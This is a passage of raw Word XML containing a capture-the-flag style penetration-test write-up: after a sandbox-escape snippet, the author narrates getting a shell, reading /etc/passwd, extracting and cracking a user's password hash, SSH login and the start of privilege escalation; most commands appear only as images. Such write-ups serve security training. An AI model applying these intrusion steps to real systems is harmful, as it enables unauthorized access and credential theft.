          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>stdout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00763E93">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A3E526"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stdout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00763E93">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789AA0D8"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5F196797"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA80610"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p>
    <w:p w14:paraId="04FD7779" w14:textId="77777777" w:rsidR="00763E93" w:rsidRPr="00763E93" w:rsidRDefault="00763E93" w:rsidP="00763E93">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console.log(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00763E93">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>vm.run</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00763E93">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>(code));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1F2472" w14:textId="3474AB60" w:rsidR="00763E93" w:rsidRPr="009A2540" w:rsidRDefault="00B2247E" w:rsidP="00476343">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">I obtained a shell with user </w:t>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>svc</w:t>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. However, this user has not the user flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE1F5ED" w14:textId="77777777" w:rsidR="00B2247E" w:rsidRPr="009A2540" w:rsidRDefault="00B2247E" w:rsidP="00B2247E">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43EA7031" wp14:editId="3B016F53">
            <wp:extent cx="6118860" cy="2499360"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14315711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499360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="652A7486" w14:textId="1141845B" w:rsidR="00B2247E" w:rsidRPr="009A2540" w:rsidRDefault="00B2247E" w:rsidP="00B2247E">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc157155785"/>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3</w:t>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Shell obtained with user without user flag</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="2C0B027D" w14:textId="5CB838AD" w:rsidR="00B2247E" w:rsidRPr="009A2540" w:rsidRDefault="00B2247E" w:rsidP="00476343">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The next step was </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>stabilize</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the shell, with the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4670906B" w14:textId="77777777" w:rsidR="00B2247E" w:rsidRPr="009A2540" w:rsidRDefault="00B2247E" w:rsidP="00B2247E">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1916CD98" wp14:editId="62C2A5A7">
            <wp:extent cx="3878580" cy="381000"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="10245402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381000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CD475F" w14:textId="63418086" w:rsidR="00B2247E" w:rsidRPr="009A2540" w:rsidRDefault="00B2247E" w:rsidP="00B2247E">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc157155786"/>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4</w:t>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Obtain a better shell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="4B5730AB" w14:textId="1740DEB8" w:rsidR="00B2247E" w:rsidRPr="009A2540" w:rsidRDefault="00B2247E" w:rsidP="00476343">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">From this shell, I read the </w:t>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/passwd</w:t>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> file to search new users:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B4A64D" w14:textId="77777777" w:rsidR="00B2247E" w:rsidRPr="009A2540" w:rsidRDefault="00B2247E" w:rsidP="00B2247E">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="719E02D3" wp14:editId="2995F357">
            <wp:extent cx="4732020" cy="4125049"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="6684006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996" cy="4129387"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACA9946" w14:textId="5FDF4AD3" w:rsidR="00B2247E" w:rsidRPr="009A2540" w:rsidRDefault="00B2247E" w:rsidP="00B2247E">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc157155787"/>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5</w:t>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/passwd file</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="4997865D" w14:textId="4A96447E" w:rsidR="00B2247E" w:rsidRPr="009A2540" w:rsidRDefault="00B2247E" w:rsidP="00476343">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The user I need is that called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>joshua</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. I navigate the file system to search some interesting information. In the application folder, in particular in </w:t>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/var/www/contact</w:t>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00837836" w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tickets.db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00837836" w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> file is very interesting. In this file I found </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00837836" w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>joshua’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00837836" w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> hashed credentials, as shown in the following picture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BED9CC6" w14:textId="77777777" w:rsidR="00837836" w:rsidRPr="009A2540" w:rsidRDefault="00837836" w:rsidP="00837836">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D3214D8" wp14:editId="7F56A776">
            <wp:extent cx="6103620" cy="746760"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="178583356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3620" cy="746760"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6799CBD6" w14:textId="545FCE63" w:rsidR="00837836" w:rsidRPr="009A2540" w:rsidRDefault="00837836" w:rsidP="00837836">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc157155788"/>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6</w:t>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>joshua</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>' hashed credentials</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="7D82D877" w14:textId="3B778518" w:rsidR="00837836" w:rsidRPr="009A2540" w:rsidRDefault="00837836" w:rsidP="00476343">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">So, I tried to crack this password using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JohnTheRipper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool, and I obtained a match.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF9FA73" w14:textId="77777777" w:rsidR="00837836" w:rsidRPr="009A2540" w:rsidRDefault="00837836" w:rsidP="00837836">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FD6138A" wp14:editId="667DF659">
            <wp:extent cx="6118860" cy="1196340"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="28637350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1196340"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF32C68" w14:textId="388B2E30" w:rsidR="00837836" w:rsidRPr="009A2540" w:rsidRDefault="00837836" w:rsidP="00837836">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc157155789"/>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7</w:t>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Password cracked</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="1E826549" w14:textId="21B18B17" w:rsidR="00837836" w:rsidRPr="009A2540" w:rsidRDefault="00837836" w:rsidP="00476343">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Using the credentials just found, I logged in the system as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>joshua</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> via SSH:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443C8DF6" w14:textId="4381A785" w:rsidR="00837836" w:rsidRPr="009A2540" w:rsidRDefault="00837836" w:rsidP="00837836">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B7EAF84" wp14:editId="47DD619C">
            <wp:extent cx="5944746" cy="3642360"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="35440245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47" cy="3676672"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A9E440" w14:textId="38D2CF60" w:rsidR="00837836" w:rsidRPr="009A2540" w:rsidRDefault="00837836" w:rsidP="00837836">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc157155790"/>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8</w:t>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Log in as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>joshua</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="39FCC3AA" w14:textId="77777777" w:rsidR="00837836" w:rsidRPr="009A2540" w:rsidRDefault="00837836" w:rsidP="00476343">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>So, I retrieved the user flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680B6ADD" w14:textId="77777777" w:rsidR="00837836" w:rsidRPr="009A2540" w:rsidRDefault="00837836" w:rsidP="00837836">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="412FCF11" wp14:editId="6227A8E6">
            <wp:extent cx="2788920" cy="563880"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="75700150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563880"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A475A62" w14:textId="4E08AE6F" w:rsidR="00837836" w:rsidRPr="009A2540" w:rsidRDefault="00837836" w:rsidP="00837836">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc157155791"/>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9</w:t>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - User flag</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="141FF098" w14:textId="6B5036E4" w:rsidR="00837836" w:rsidRPr="009A2540" w:rsidRDefault="00837836" w:rsidP="00837836">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc157155772"/>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Privilege escalation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="1FD2BBD0" w14:textId="3925A8E1" w:rsidR="00837836" w:rsidRPr="009A2540" w:rsidRDefault="009A2540" w:rsidP="00837836">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">It was the time to escalate my privileges to root privilege. As usual, I tried to launch </w:t>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>linpeas.sh</w:t>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> script. In this case, I had an interesting information. Joshua user can run a specific command as root:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15000547" w14:textId="77777777" w:rsidR="009A2540" w:rsidRPr="009A2540" w:rsidRDefault="009A2540" w:rsidP="009A2540">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A99ADB5" wp14:editId="47AB9CD0">
            <wp:extent cx="6118860" cy="762000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="50555032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762000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67214076" w14:textId="5EF99A16" w:rsidR="009A2540" w:rsidRPr="009A2540" w:rsidRDefault="009A2540" w:rsidP="009A2540">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc157155792"/>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303595">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Info </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usefule</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to privilege escalation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="486D9881" w14:textId="1FF87888" w:rsidR="009A2540" w:rsidRDefault="009A2540" w:rsidP="00837836">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> tries to connect to the database. However, it uses a not safe comparison for the password via </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
